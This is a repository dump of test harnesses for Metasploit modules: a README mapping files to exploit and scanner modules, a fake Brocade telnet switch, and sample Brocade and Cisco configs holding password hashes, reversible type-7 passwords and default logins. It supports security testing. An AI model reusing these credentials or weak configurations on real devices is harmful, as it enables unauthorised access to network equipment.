├── .gitattributes ├── NetBSD-7.0.1-amd64.iso ├── Panda_AV_Pro2016_16.1.2.exe ├── README.md ├── WNR2000v3_V1.1.2.10.zip ├── brocade_08.0.30hT311_ic_icx6430.conf ├── brocade_emulator.py ├── brocade_icx6430_nopass.conf ├── brocade_icx6430_pass.conf ├── centreon-2.5.3.tar.gz ├── cisco-2950.config ├── cisco-uc520.config ├── coloradoftp-prime-8.zip ├── enum_brocade.rb ├── ipfire-2.15.i586-full-core82.iso ├── ipfire-2.19.x86_64-full-core100.iso ├── john_vs_hashcat.md ├── juniper_ex2200.config ├── juniper_ex2200_access_denied.config ├── juniper_firmware ├── README.md ├── imagekey.cer └── ssg5ssg20.6.3.0r19.0 ├── juniper_ssg5_emulator.py ├── juniper_ssg5_screenos.conf ├── juniper_ssg5_ssh_emulator.py ├── juniper_strings.py ├── netcore ├── README.md ├── netcore_module_check_then_run_sanitized_160525-210525_clean.pcap ├── netcore_module_run_big_endian_sanitized_160525-210552.pcap ├── netcore_module_run_sanitized_160525-210507.pcap └── netcore_python_sanitized_160525-210510_clean.pcap ├── netis_backdoor.py ├── op5-monitor-7.1.9-20160303.tar.gz ├── srsexec ├── sunxi-debug.c ├── test_rsa.key ├── tiki-14.1.tar.gz └── werkzeug_console.py /.gitattributes: -------------------------------------------------------------------------------- 1 | *.iso filter=lfs diff=lfs merge=lfs -text 2 | *.tar.gz filter=lfs diff=lfs merge=lfs -text 3 | *.zip filter=lfs diff=lfs merge=lfs -text 4 | -------------------------------------------------------------------------------- /NetBSD-7.0.1-amd64.iso: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:0d5929f8626ad07475bc8ed229c56fc73a2a01efd41f30c2695719989bc00fec 3 | size 389855232 4 | -------------------------------------------------------------------------------- /Panda_AV_Pro2016_16.1.2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/Panda_AV_Pro2016_16.1.2.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Metasploit Module Testing Scripts 2 | This repo contains code required to test some of the Metasploit modules I've helped write. 3 | 4 | ## brocade_emulator.py 5 | Metasploit Module: [auxiliary/scanner/telnet/brocade_enable_login](https://www.rapid7.com/db/modules/auxiliary/scanner/telnet/brocade_enable_login) 6 | 7 | ## juniper_ssg5_emulator.py 8 | Metasploit Module: [auxiliary/scanner/ssh/juniper_backdoor.rb](https://www.rapid7.com/db/modules/auxiliary/scanner/ssh/juniper_backdoor) 9 | Also see the Juniper_firmware folder for the actual vuln firmware 10 | 11 | ## werkzeug_console.py 12 | Metasploit Module: [exploit/multi/http/werkzeug_debug_rce](https://www.rapid7.com/db/modules/exploit/multi/http/werkzeug_debug_rce) 13 | 14 | ## sunxi-debug.c 15 | Metasploit Module: [post/multi/escalate/allwinner_backdoor](https://www.rapid7.com/db/modules/post/multi/escalate/allwinner_backdoor) 16 | 17 | ## ipfire-2.15.i586-full-core82.iso 18 | Metasploit Module: [exploit/linux/http/ipfire_bashbug_exec](https://www.rapid7.com/db/modules/exploit/linux/http/ipfire_bashbug_exec) 19 | 20 | ## ipfire-2.19.x86_64-full-core100.iso 21 | Metasploit Module: [exploit/linux/http/ipfire_proxy_exec](https://www.rapid7.com/db/modules/exploit/linux/http/ipfire_proxy_exec) 22 | 23 | ## op5-monitor-7.1.9-20160303.tar.gz 24 | Metasploit Module: [exploit/linux/http/op5_config_exec](https://www.rapid7.com/db/modules/exploit/linux/http/op5_config_exec) 25 | 26 | ## centreon-2.5.3.tar.gz 27 | Metasploit Module: [exploit/linux/http/centreon_useralias_exec](https://www.rapid7.com/db/modules/exploit/linux/http/centreon_useralias_exec) 28 | 29 | ## tiki-14.1.tar.gz 30 | Metasploit Module: [exploit/linux/http/tiki_calendar_exec](https://www.rapid7/db/modules/exploit/linux/http/tiki_calendar_exec) 31 | 32 | ## WNR2000v3_V1.1.2.10.zip 33 | Metasploit Module: [auxiliary/admin/http/netgear_soap_password_extractor](https://www.rapid7.com/db/modules/auxiliary/admin/http/netgear_soap_password_extractor) 34 | 35 | ## netis_backdoor.py 36 | Metasploit Module: [exploit/linux/misc/netcore_udp_53413_backdoor](https://www.rapid7.com/db/modules/exploit/linux/misc/netcore_udp_53413_backdoor) 37 | 38 | ## NetBSD-7.0.1-amd64.iso 39 | Metasploit Module: [exploit/unix/local/netbsd_mail_local](https://www.rapid7.com/db/modules/exploit/unix/local/netbsd_mail_local) 40 | 41 | ## coloradoftp-prime-8.zip 42 | Metasploit Module: []() 43 | 44 | ## Panda_AV_Pro2016_16.1.2.exe 45 | Metasploit Module: []() 46 | 47 | -------------------------------------------------------------------------------- /WNR2000v3_V1.1.2.10.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/WNR2000v3_V1.1.2.10.zip -------------------------------------------------------------------------------- /brocade_08.0.30hT311_ic_icx6430.conf: -------------------------------------------------------------------------------- 1 | ! 2 | Startup-config data location is flash memory 3 | ! 4 | Startup configuration: 5 | ! 6 | ver 08.0.20T311 7 | ! 8 | stack unit 1 9 | module 1 icx6430-24-port-management-module 10 | module 2 icx6430-sfp-4port-4g-module 11 | ! 12 | ! 13 | ! 14 | ! 15 | ! 16 | ! 17 | ! 18 | ! 19 | aaa authentication web-server default local 20 | aaa authentication login default local 21 | enable password-display 22 | enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm. 23 | ip address 2.2.2.2 255.255.255.0 dynamic 24 | ip dns server-address 1.1.1.1 25 | ip default-gateway 1.1.1.1 26 | ! 27 | username brocade password 8 $1$f/uxhovU$dST5lNskZCPQe/5QijULi0 28 | username test password 8 $1$qKOcZizM$ySW1EyiUpKSHw9MT4PZ11. 29 | snmp-server community 2 $MlVzZCFAbg== ro 30 | snmp-server community 2 $U2kyXj1k rw 31 | ! 32 | ! 33 | interface ethernet 1/1/1 34 | speed-duplex 1000-full-master 35 | ! 36 | interface ethernet 1/1/2 37 | speed-duplex 1000-full-master 38 | ! 39 | interface ethernet 1/1/3 40 | speed-duplex 1000-full-master 41 | ! 42 | interface ethernet 1/1/4 43 | speed-duplex 1000-full-master 44 | ! 45 | interface ethernet 1/1/5 46 | speed-duplex 1000-full-master 47 | ! 48 | interface ethernet 1/1/6 49 | speed-duplex 1000-full-master 50 | ! 51 | interface ethernet 1/1/7 52 | speed-duplex 1000-full-master 53 | ! 54 | interface ethernet 1/1/8 55 | speed-duplex 1000-full-master 56 | ! 57 | interface ethernet 1/1/9 58 | speed-duplex 1000-full-master 59 | ! 60 | interface ethernet 1/1/10 61 | speed-duplex 1000-full-master 62 | ! 63 | interface ethernet 1/1/11 64 | speed-duplex 1000-full-master 65 | ! 66 | interface ethernet 1/1/12 67 | speed-duplex 1000-full-master 68 | ! 69 | interface ethernet 1/1/13 70 | speed-duplex 1000-full-master 71 | ! 72 | interface ethernet 1/1/14 73 | speed-duplex 1000-full-master 74 | ! 75 | interface ethernet 1/1/15 76 | speed-duplex 1000-full-master 77 | ! 78 | interface ethernet 1/1/16 79 | speed-duplex 1000-full-master 80 | ! 81 | interface ethernet 1/1/17 82 | speed-duplex 1000-full-master 83 | ! 84 | interface ethernet 1/1/18 85 | speed-duplex 1000-full-master 86 | ! 87 | interface ethernet 1/1/19 88 | speed-duplex 1000-full-master 89 | ! 90 | interface ethernet 1/1/20 91 | speed-duplex 1000-full-master 92 | ! 93 | interface ethernet 1/1/21 94 | speed-duplex 1000-full-master 95 | ! 96 | interface ethernet 1/1/22 97 | speed-duplex 1000-full-master 98 | ! 99 | interface ethernet 1/1/23 100 | speed-duplex 1000-full-master 101 | no spanning-tree 102 | ! 103 | interface ethernet 1/1/24 104 | speed-duplex 1000-full-master 105 | no spanning-tree 106 | ! 107 | ! 108 | ! 109 | ! 110 | ! 111 | ! 112 | ! 113 | ! 114 | end 115 | -------------------------------------------------------------------------------- /brocade_emulator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #code base from http://homepages.ius.edu/jfdoyle/B438/HTML/chatserver4chatserver5Python.htm 4 | #this is a brocade emulator for testing against the Metasploit modules for brocade, 5 | #based on the switch I own. We've only emulated a few functions (?, show config, enable) and kept some 6 | #features out like tab complete, ? on commands, just to keep this code fairly simple. 7 | #we've also forged in a 'switchversion' command, which will dynamically switch from 7.2 emulation to 7.4 emulation. 8 | 9 | import socket, threading 10 | import string 11 | import time 12 | 13 | #prompts 14 | PROMPT = "brocade@FWS624>" 15 | ENABLED_PROMPT = "brocade@FW624#" 16 | 17 | #format is ('username','password'):privilege 18 | un_pass_config = { 19 | ('username','password'):'', 20 | ('ttrogdon','ttrogdon'):5, 21 | ('dmudd', 'crazypassword'):4 22 | } 23 | un_pass_running_config = { 24 | ('TopDogUser','mystery'):'' 25 | } 26 | 27 | class server(threading.Thread) : 28 | def __init__(self, (socket, address) ): 29 | threading.Thread.__init__(self) 30 | self.SOCKET=socket 31 | self.ADDRESS=address 32 | self.enabled = False 33 | self.version = "7.2" 34 | 35 | def run(self) : 36 | lock.acquire() 37 | vector.append(self) 38 | lock.release() 39 | print 'Connected ', self.ADDRESS 40 | #send the consent banner 41 | self.SOCKET.send("""Warning Notification!!! 42 | This system is to be used by authorized users only for the purpose of 43 | conducting official company work. Any activities conducted on this system may 44 | be monitored and/or recorded and there is no expectation of privacy while 45 | using this system. All possible abuse and criminal activity may be handed 46 | over to the proper law enforcement officials for investigation and 47 | prosecution. Use of this system implies consent to all of the conditions 48 | stated within this Warning Notification.""") 49 | while True : 50 | self.SOCKET.send('\n' + ENABLED_PROMPT) if self.enabled else self.SOCKET.send('\n' + PROMPT) 51 | From=self.SOCKET.recv(1024) # Read from client 52 | #telnet clients tend to send some binary before giving input to the client to type... so we'll filter that 53 | if len(From) <= 0: 54 | continue 55 | if not From[0] in string.printable: 56 | continue 57 | From_upper = From.upper().strip() 58 | if From_upper == 'QUIT' or From_upper == 'LOGOUT': 59 | self.SOCKET.close() 60 | break 61 | elif From_upper == 'EXIT': 62 | if self.enabled: 63 | self.enabled = False 64 | else: 65 | self.SOCKET.close() 66 | break 67 | elif From_upper == 'SWITCHVERSION': 68 | self.version = "7.4" if self.version == "7.2" else "7.2" 69 | print("Version is now set to: %s" %(self.version)) 70 | elif From_upper == 'SHOW CONFIG' or From_upper == 'SHOW RUNNING-CONFIG': 71 | #we want to build our username list part dynamically for the config file to make sure its configurable 72 | unlist = [] 73 | credToUse = un_pass_config if From_upper == 'SHOW CONFIG' else un_pass_running_config 74 | for cred in credToUse: 75 | un,p = cred 76 | if credToUse[cred]: #we have a permission to add 77 | unlist.append("username %s privilege %s password ....." %(un,credToUse[cred])) 78 | else: 79 | unlist.append("username %s password ....." %(un)) 80 | unlist = "\n".join(unlist) 81 | if self.version == "7.2": 82 | self.SOCKET.send("""! 83 | Startup-config data location is flash memory 84 | ! 85 | Startup configuration: 86 | ! 87 | ver 07.2.02fT7e1 88 | ! 89 | module 1 fwsl00m-24-port-copper-base-module 90 | ! 91 | tftp disable 92 | ! 93 | ! 94 | ! 95 | vlan 1 name DEFAULT-VLAN by port 96 | ! 97 | vlan 100 by port 98 | ! 99 | ! 100 | ! 101 | ! 102 | system-max hw-ip-route-tcam 64 103 | ! 104 | ! 105 | ! 106 | aaa authentication web-server default local 107 | aaa authentication login default local 108 | boot sys fl sec 109 | console timeout 10 110 | enable super-user-password ..... 111 | hostname brocade 112 | ip dhcp-server enable 113 | ! 114 | ip dhcp-server pool bro 115 | dns-server 192.168.50.1 116 | domain-name groupbro 117 | lease 1 0 0 118 | network 192.168.50.0 255.255.255.0 119 | ! 120 | ip route 0.0.0.0 0.0.0.0 10.210.10.65 121 | ! 122 | no ip source-route 123 | logging facility local4 124 | no logging buffered debugging 125 | logging console 126 | no telnet server 127 | telnet server enable vlan 1 128 | %s 129 | password-change any 130 | cdp run 131 | fdp run 132 | snmp-server community ..... ro 15 133 | clock summer-time 134 | clock timezone us Eastern 135 | no web-management hp-top-tools 136 | no web-management http 137 | banner motd ^C 138 | **********************************************^C 139 | **********************************************^C 140 | WARNING .... WARNING .... WARNING^C 141 | You have entered into a restricted site.^C 142 | This system is to be accessed only by^C 143 | specifically authorized personnel. Any^C 144 | unauthorized access or use of this system^C 145 | is strictly prohibited and constitutes a^C 146 | violation of federal, state criminal, and^C 147 | of the United States Code and applicable^C 148 | international laws. Violators will be^C 149 | prosecuted to the fullest extent of the law.^C 150 | logged and/or monitored without further^C 151 | notice, and these logs may be used as^C 152 | evidence in court.^C 153 | **********************************************^C 154 | ^C 155 | ! 156 | no port bootp 157 | ! 158 | ! 159 | access-list 15 permit host 10.1.2.32 160 | access-list 15 deny any log 161 | ! 162 | ! 163 | ! 164 | ! 165 | ip ssh idle-time 10 166 | ! 167 | ! 168 | end 169 | """ %(unlist)) 170 | elif self.version == "7.4": 171 | self.SOCKET.send("""! 172 | Startup-config data location is flash memory 173 | ! 174 | Startup configuration: 175 | ! 176 | ver 07.4.00bT311 177 | ! 178 | stack unit 1 179 | module 1 icx6450-24-port-management-module 180 | module 2 icx6450-sfp-plus-4port-40g-module 181 | ! 182 | ! 183 | ! 184 | ! 185 | vlan 1 name DEFAULT-VLAN by port 186 | ! 187 | vlan 901 name Test by port 188 | tagged ethe 1/1/1 to 1/1/12 189 | untagged ethe 1/1/12 to 1/1/24 190 | ! 191 | ! 192 | ! 193 | ! 194 | ! 195 | ! 196 | ! 197 | ! 198 | aaa authentication enable default local 199 | aaa authentication login default local 200 | console timeout 10 201 | enable super-user-password ..... 202 | enable aaa console 203 | hostname bro-switch 204 | ip address 10.1.2.1 255.255.255.224 205 | no ip dhcp-client enable 206 | %s 207 | no snmp-server 208 | 209 | no snmp-server community public ro 210 | 211 | no web-management http 212 | banner exec ^C 213 | Warning Notification!!!^C 214 | This system is to be used by authorized users only for the purpose of^C 215 | conducting official company work. Any activities conducted on this system may^C 216 | be monitored and/or recorded and there is no expectation of privacy while^C 217 | using this system. All possible abuse and criminal activity may be handed^C 218 | over to the proper law enforcement officials for investigation and^C 219 | prosecution. Use of this system implies consent to all of the conditions^C 220 | stated within this Warning Notification.^C 221 | ^C 222 | ! 223 | banner motd require-enter-key 224 | banner motd ^C 225 | Warning Notification!!!^C 226 | This system is to be used by authorized users only for the purpose of^C 227 | conducting official company work. Any activities conducted on this system may^C 228 | be monitored and/or recorded and there is no expectation of privacy while^C 229 | using this system. All possible abuse and criminal activity may be handed^C 230 | over to the proper law enforcement officials for investigation and^C 231 | prosecution. Use of this system implies consent to all of the conditions^C 232 | stated within this Warning Notification.^C 233 | ^C 234 | ! 235 | banner incoming ^C 236 | Warning Notification!!!^C 237 | This system is to be used by authorized users only for the purpose of^C 238 | conducting official company work. Any activities conducted on this system may^C 239 | be monitored and/or recorded and there is no expectation of privacy while^C 240 | using this system. All possible abuse and criminal activity may be handed^C 241 | over to the proper law enforcement officials for investigation and^C 242 | prosecution. Use of this system implies consent to all of the conditions^C 243 | stated within this Warning Notification.^C 244 | ^C 245 | ! 246 | ssh access-group 10 247 | interface ethernet 1/1/1 248 | speed-duplex 1000-full-master 249 | ! 250 | interface ethernet 1/1/2 251 | speed-duplex 1000-full-master 252 | ! 253 | interface ethernet 1/1/4 254 | speed-duplex 1000-full-master 255 | ! 256 | ! 257 | access-list 10 permit 10.1.2.1 0.0.0.24 258 | access-list 10 deny any log 259 | ! 260 | ! 261 | ! 262 | ! 263 | ip ssh timeout 30 264 | ip ssh idle-time 10 265 | ! 266 | ! 267 | end 268 | """ %(unlist)) 269 | elif From_upper == 'ENABLE': 270 | self.SOCKET.send("User Name: ") 271 | un = self.SOCKET.recv(1024) 272 | if un.upper() == "LOGOUT": break 273 | print(" Username: %s" %(un.strip())) 274 | self.SOCKET.send("Password: ") 275 | pas = self.SOCKET.recv(1024) 276 | if pas.upper() == "LOGOUT": break 277 | print(" Password: %s" %(pas.strip())) 278 | if (un.strip(),pas.strip()) in un_pass_config or (un.strip(),pas.strip()) in un_pass_running_config: 279 | self.enabled = True 280 | else: 281 | self.SOCKET.send("Error - Incorrect username or password.") 282 | elif From_upper == '?': 283 | self.SOCKET.send(""" enable Enter Privileged mode 284 | ping Ping IP node 285 | show Display system information 286 | stop-traceroute Stop current TraceRoute 287 | traceroute TraceRoute to IP Node""") 288 | elif From_upper == 'SHOW VERSION': 289 | if self.version == "7.2": 290 | self.SOCKET.send(""" Copyright (c) 1996-2010 Brocade Communications Systems, Inc. 291 | UNIT 1: compiled on Feb 16 2012 at 20:20:31 labeled as FGSL07202f 292 | (3172304 bytes) from Secondary FGSL07202f.bin 293 | SW: Version 07.2.02fT7e1 294 | Boot-Monitor Image size = 416213, Version:05.0.00T7e5 (Fev2) 295 | HW: Stackable FWS624 296 | ========================================================================== 297 | UNIT 1: SL 1: FastIron WS 624 24-port Management Module 298 | Serial #: AN11111111 299 | License: FWS_BASE_L3_SOFT_PACKAGE (LID: aaAAAAAAAA) 300 | P-ENGINE 0: type D814, rev 01 301 | ========================================================================== 302 | 400 MHz Power PC processor 8248 (version 130/2014) 66 MHz bus 303 | 512 KB boot flash memory 304 | 30720 KB code flash memory 305 | 256 MB DRAM 306 | STACKID 1 system uptime is 2 days 4 hours 25 minutes 10 seconds 307 | The system : started=warm start reloaded=by "reload" 308 | """) 309 | elif self.version == "7.4": 310 | self.SOCKET.send(""" Copyright (c) 1996-2012 Brocade Communications Systems, Inc. All rights reserved. 311 | UNIT 1: compiled on Oct 3 2012 at 08:42:29 labeled as ICX64S07400b 312 | (10371776 bytes) from Primary ICX64S07400b.bin 313 | SW: Version 07.4.00bT311 314 | Boot-Monitor Image size = 776680, Version:07.4.01T310 (kxz07401) 315 | HW: Stackable ICX6450-24 316 | ========================================================================== 317 | UNIT 1: SL 1: ICX6450-24 24-port Management Module 318 | Serial #: BAA1111A11A 319 | License: BASE_SOFT_PACKAGE (LID: aaaAAAAaAAa) 320 | P-ENGINE 0: type DEF0, rev 01 321 | ========================================================================== 322 | UNIT 1: SL 2: ICX6450-SFP-Plus 4port 40G Module 323 | ========================================================================== 324 | 800 MHz ARM processor ARMv5TE, 400 MHz bus 325 | 65536 KB flash memory 326 | 512 MB DRAM 327 | STACKID 1 system uptime is 78 days 2 hours 54 minutes 7 seconds 328 | The system : started=cold start 329 | """) 330 | else: 331 | self.SOCKET.send('Invalid input -> %s\nType ? for a list' %(From)) 332 | print "User Input:", From.replace("\n","") 333 | print 'Disconnected ', self.ADDRESS 334 | lock.acquire() 335 | vector.remove(self) 336 | lock.release() 337 | 338 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 339 | while True: 340 | try: 341 | s.bind(('', 23)) 342 | break 343 | except socket.error: 344 | print("[e] Address in use or permission error, sleeping 30sec then trying again") 345 | time.sleep(30) 346 | s.listen(4) 347 | vector = [] 348 | lock=threading.Lock() 349 | print("Server started") 350 | while True : # Wait for connection/run server 351 | server( s.accept() ).start(); 352 | -------------------------------------------------------------------------------- /brocade_icx6430_nopass.conf: -------------------------------------------------------------------------------- 1 | ! 2 | Startup-config data location is flash memory 3 | ! 4 | Startup configuration: 5 | ! 6 | ver 08.0.20T311 7 | ! 8 | stack unit 1 9 | module 1 icx6430-24-port-management-module 10 | module 2 icx6430-sfp-4port-4g-module 11 | ! 12 | ! 13 | ! 14 | ! 15 | ! 16 | ! 17 | ! 18 | ! 19 | aaa authentication web-server default local 20 | aaa authentication login default local 21 | ! 22 | enable super-user-password ..... 23 | ip address 10.1.1.243 255.0.0.0 dynamic 24 | ip dns server-address 10.1.1.1 25 | ip default-gateway 10.1.1.1 26 | ! 27 | username brocade password ..... 28 | username test password ..... 29 | snmp-server community ..... ro 30 | snmp-server community ..... rw 31 | ! 32 | ! 33 | interface ethernet 1/1/1 34 | speed-duplex 1000-full-master 35 | ! 36 | interface ethernet 1/1/2 37 | speed-duplex 1000-full-master 38 | ! 39 | interface ethernet 1/1/3 40 | speed-duplex 1000-full-master 41 | ! 42 | interface ethernet 1/1/4 43 | speed-duplex 1000-full-master 44 | ! 45 | interface ethernet 1/1/5 46 | speed-duplex 1000-full-master 47 | ! 48 | interface ethernet 1/1/6 49 | speed-duplex 1000-full-master 50 | ! 51 | interface ethernet 1/1/7 52 | speed-duplex 1000-full-master 53 | ! 54 | interface ethernet 1/1/8 55 | speed-duplex 1000-full-master 56 | ! 57 | interface ethernet 1/1/9 58 | speed-duplex 1000-full-master 59 | ! 60 | interface ethernet 1/1/10 61 | speed-duplex 1000-full-master 62 | ! 63 | interface ethernet 1/1/11 64 | speed-duplex 1000-full-master 65 | ! 66 | interface ethernet 1/1/12 67 | speed-duplex 1000-full-master 68 | ! 69 | interface ethernet 1/1/13 70 | speed-duplex 1000-full-master 71 | ! 72 | interface ethernet 1/1/14 73 | speed-duplex 1000-full-master 74 | ! 75 | interface ethernet 1/1/15 76 | speed-duplex 1000-full-master 77 | ! 78 | interface ethernet 1/1/16 79 | speed-duplex 1000-full-master 80 | ! 81 | interface ethernet 1/1/17 82 | speed-duplex 1000-full-master 83 | ! 84 | interface ethernet 1/1/18 85 | speed-duplex 1000-full-master 86 | ! 87 | interface ethernet 1/1/19 88 | speed-duplex 1000-full-master 89 | ! 90 | interface ethernet 1/1/20 91 | speed-duplex 1000-full-master 92 | ! 93 | interface ethernet 1/1/21 94 | speed-duplex 1000-full-master 95 | ! 96 | interface ethernet 1/1/22 97 | speed-duplex 1000-full-master 98 | ! 99 | interface ethernet 1/1/23 100 | speed-duplex 1000-full-master 101 | no spanning-tree 102 | ! 103 | interface ethernet 1/1/24 104 | speed-duplex 1000-full-master 105 | no spanning-tree 106 | ! 107 | ! 108 | ! 109 | ! 110 | ! 111 | ! 112 | ! 113 | ! 114 | end 115 | -------------------------------------------------------------------------------- /brocade_icx6430_pass.conf: -------------------------------------------------------------------------------- 1 | ! 2 | Startup-config data location is flash memory 3 | ! 4 | Startup configuration: 5 | ! 6 | ver 08.0.20T311 7 | ! 8 | stack unit 1 9 | module 1 icx6430-24-port-management-module 10 | module 2 icx6430-sfp-4port-4g-module 11 | ! 12 | ! 13 | ! 14 | ! 15 | ! 16 | ! 17 | ! 18 | ! 19 | aaa authentication web-server default local 20 | aaa authentication login default local 21 | enable password-display 22 | enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm. 23 | ip address 10.1.1.243 255.0.0.0 dynamic 24 | ip dns server-address 10.1.1.1 25 | ip default-gateway 10.1.1.1 26 | ! 27 | username brocade password 8 $1$f/uxhovU$dST5lNskZCPQe/5QijULi0 28 | username test password 8 $1$qKOcZizM$ySW1EyiUpKSHw9MT4PZ11. 29 | snmp-server community 2 $MlVzZCFAbg== ro 30 | snmp-server community 2 $U2kyXj1k rw 31 | ! 32 | ! 33 | interface ethernet 1/1/1 34 | speed-duplex 1000-full-master 35 | ! 36 | interface ethernet 1/1/2 37 | speed-duplex 1000-full-master 38 | ! 39 | interface ethernet 1/1/3 40 | speed-duplex 1000-full-master 41 | ! 42 | interface ethernet 1/1/4 43 | speed-duplex 1000-full-master 44 | ! 45 | interface ethernet 1/1/5 46 | speed-duplex 1000-full-master 47 | ! 48 | interface ethernet 1/1/6 49 | speed-duplex 1000-full-master 50 | ! 51 | interface ethernet 1/1/7 52 | speed-duplex 1000-full-master 53 | ! 54 | interface ethernet 1/1/8 55 | speed-duplex 1000-full-master 56 | ! 57 | interface ethernet 1/1/9 58 | speed-duplex 1000-full-master 59 | ! 60 | interface ethernet 1/1/10 61 | speed-duplex 1000-full-master 62 | ! 63 | interface ethernet 1/1/11 64 | speed-duplex 1000-full-master 65 | ! 66 | interface ethernet 1/1/12 67 | speed-duplex 1000-full-master 68 | ! 69 | interface ethernet 1/1/13 70 | speed-duplex 1000-full-master 71 | ! 72 | interface ethernet 1/1/14 73 | speed-duplex 1000-full-master 74 | ! 75 | interface ethernet 1/1/15 76 | speed-duplex 1000-full-master 77 | ! 78 | interface ethernet 1/1/16 79 | speed-duplex 1000-full-master 80 | ! 81 | interface ethernet 1/1/17 82 | speed-duplex 1000-full-master 83 | ! 84 | interface ethernet 1/1/18 85 | speed-duplex 1000-full-master 86 | ! 87 | interface ethernet 1/1/19 88 | speed-duplex 1000-full-master 89 | ! 90 | interface ethernet 1/1/20 91 | speed-duplex 1000-full-master 92 | ! 93 | interface ethernet 1/1/21 94 | speed-duplex 1000-full-master 95 | ! 96 | interface ethernet 1/1/22 97 | speed-duplex 1000-full-master 98 | ! 99 | interface ethernet 1/1/23 100 | speed-duplex 1000-full-master 101 | no spanning-tree 102 | ! 103 | interface ethernet 1/1/24 104 | speed-duplex 1000-full-master 105 | no spanning-tree 106 | ! 107 | ! 108 | ! 109 | ! 110 | ! 111 | ! 112 | ! 113 | ! 114 | end 115 | -------------------------------------------------------------------------------- /centreon-2.5.3.tar.gz: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:8da401a237662a3646d2acf28010047d887ba6d4b9fb2d7b760a26360fafb569 3 | size 14114292 4 | -------------------------------------------------------------------------------- /cisco-2950.config: -------------------------------------------------------------------------------- 1 | Building configuration... 2 | 3 | Current configuration : 2279 bytes 4 | ! 5 | version 12.1 6 | no service pad 7 | service timestamps debug uptime 8 | service timestamps log uptime 9 | no service password-encryption 10 | ! 11 | hostname cat2950 12 | ! 13 | aaa new-model 14 | enable secret 5 $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0 15 | enable password 7 06160E325F59060B01 16 | ! 17 | username encrypted privilege 15 password 7 0824424D1B001503170F 18 | username admin password 0 admin 19 | username cisco password 0 cisco 20 | ip subnet-zero 21 | ! 22 | ip domain-name ragegroup 23 | ip ssh time-out 60 24 | ip ssh authentication-retries 3 25 | ip ssh version 2 26 | ! 27 | spanning-tree mode pvst 28 | no spanning-tree optimize bpdu transmission 29 | spanning-tree extend system-id 30 | ! 31 | ! 32 | ! 33 | ! 34 | interface FastEthernet0/1 35 | ! 36 | interface FastEthernet0/2 37 | ! 38 | interface FastEthernet0/3 39 | ! 40 | interface FastEthernet0/4 41 | ! 42 | interface FastEthernet0/5 43 | ! 44 | interface FastEthernet0/6 45 | ! 46 | interface FastEthernet0/7 47 | ! 48 | interface FastEthernet0/8 49 | ! 50 | interface FastEthernet0/9 51 | ! 52 | interface FastEthernet0/10 53 | ! 54 | interface FastEthernet0/11 55 | ! 56 | interface FastEthernet0/12 57 | ! 58 | interface FastEthernet0/13 59 | ! 60 | interface FastEthernet0/14 61 | ! 62 | interface FastEthernet0/15 63 | ! 64 | interface FastEthernet0/16 65 | ! 66 | interface FastEthernet0/17 67 | ! 68 | interface FastEthernet0/18 69 | ! 70 | interface FastEthernet0/19 71 | ! 72 | interface FastEthernet0/20 73 | ! 74 | interface FastEthernet0/21 75 | ! 76 | interface FastEthernet0/22 77 | ! 78 | interface FastEthernet0/23 79 | ! 80 | interface FastEthernet0/24 81 | ! 82 | interface FastEthernet0/25 83 | ! 84 | interface FastEthernet0/26 85 | ! 86 | interface FastEthernet0/27 87 | ! 88 | interface FastEthernet0/28 89 | ! 90 | interface FastEthernet0/29 91 | ! 92 | interface FastEthernet0/30 93 | ! 94 | interface FastEthernet0/31 95 | ! 96 | interface FastEthernet0/32 97 | ! 98 | interface FastEthernet0/33 99 | ! 100 | interface FastEthernet0/34 101 | ! 102 | interface FastEthernet0/35 103 | ! 104 | interface FastEthernet0/36 105 | ! 106 | interface FastEthernet0/37 107 | ! 108 | interface FastEthernet0/38 109 | ! 110 | interface FastEthernet0/39 111 | ! 112 | interface FastEthernet0/40 113 | ! 114 | interface FastEthernet0/41 115 | ! 116 | interface FastEthernet0/42 117 | ! 118 | interface FastEthernet0/43 119 | ! 120 | interface FastEthernet0/44 121 | ! 122 | interface FastEthernet0/45 123 | ! 124 | interface FastEthernet0/46 125 | ! 126 | interface FastEthernet0/47 127 | ! 128 | interface FastEthernet0/48 129 | ! 130 | interface GigabitEthernet0/1 131 | ! 132 | interface GigabitEthernet0/2 133 | ! 134 | interface Vlan1 135 | ip address 192.168.2.238 255.255.255.0 136 | no ip route-cache 137 | ! 138 | ip default-gateway 192.168.2.1 139 | ip http server 140 | ! 141 | line con 0 142 | line vty 0 4 143 | password password 144 | transport input ssh 145 | line vty 5 15 146 | password 7 03145A1815182E5E4A 147 | ! 148 | ! 149 | end 150 | 151 | cat2950# 152 | -------------------------------------------------------------------------------- /cisco-uc520.config: -------------------------------------------------------------------------------- 1 | ! 2 | ! No configuration change since last restart 3 | ! 4 | version 12.4 5 | parser config cache interface 6 | no service pad 7 | service timestamps debug datetime msec 8 | service timestamps log datetime msec 9 | no service password-encryption 10 | service internal 11 | service compress-config 12 | service sequence-numbers 13 | ! 14 | hostname UC520 15 | ! 16 | boot-start-marker 17 | boot-end-marker 18 | ! 19 | logging message-counter syslog 20 | enable secret 5 $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1 21 | ! 22 | aaa new-model 23 | ! 24 | ! 25 | aaa authentication login default local 26 | ! 27 | ! 28 | aaa session-id common 29 | clock timezone PST -8 30 | clock summer-time PST recurring 31 | ! 32 | crypto pki trustpoint TP-self-signed-2055677031 33 | enrollment selfsigned 34 | subject-name cn=IOS-Self-Signed-Certificate-2055677031 35 | revocation-check none 36 | rsakeypair TP-self-signed-2055677031 37 | ! 38 | ! 39 | crypto pki certificate chain TP-self-signed-2055677031 40 | certificate self-signed 01 41 | 3082023D 308201A6 A0030201 02020101 300D0609 2A864886 F70D0101 04050030 42 | 31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274 43 | 69666963 6174652D 